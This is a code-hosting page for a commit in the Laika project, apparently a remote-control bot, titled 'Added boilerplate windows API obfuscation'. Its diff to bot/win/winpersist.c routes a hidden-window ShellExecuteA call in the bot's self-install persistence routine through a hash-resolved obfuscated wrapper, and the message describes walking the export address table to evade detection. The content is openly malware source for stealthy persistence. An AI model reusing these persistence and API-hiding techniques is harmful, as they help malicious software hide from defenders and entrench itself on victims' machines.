CPunch/Laika
1
0
Fork 0
mirror of https://github.com/CPunch/Laika.git synced 2025-11-18 10:20:08 +00:00
Code Issues Projects Releases Wiki Activity

Bot: Added boilerplate windows API obfuscation

Browse Source 
- Grabs the functions directly from the loaded library by walking the exported address table and comparing hashes
- For now, only ShellExecuteA has been setup, more to come
This commit is contained in:
CPunch
2022-07-07 23:23:39 -05:00
parent 18a6fdd124
commit b2f8efc402
6 changed files with 166 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
bot/win/winpersist.c
View File

@@ -11,6 +11,7 @@
#include "lerror.h"
#include "lmem.h"
#include "lvm.h"
#include "obf.h"
#include "persist.h"
HANDLE laikaB_mutex;
@@ -150,7 +151,7 @@ void installSelf()
lstrcatA(szCmd, szInstall);
if (GetEnvironmentVariableA("COMSPEC", szFile, MAX_PATH) == 0 ||
(INT)ShellExecuteA(NULL, NULL, szFile, szCmd, NULL, SW_HIDE) <= 32)
(INT)oShellExecuteA(NULL, NULL, szFile, szCmd, NULL, SW_HIDE) <= 32)
LAIKA_ERROR("Failed to start shell for moving exe!\n");
laikaB_unmarkRunning();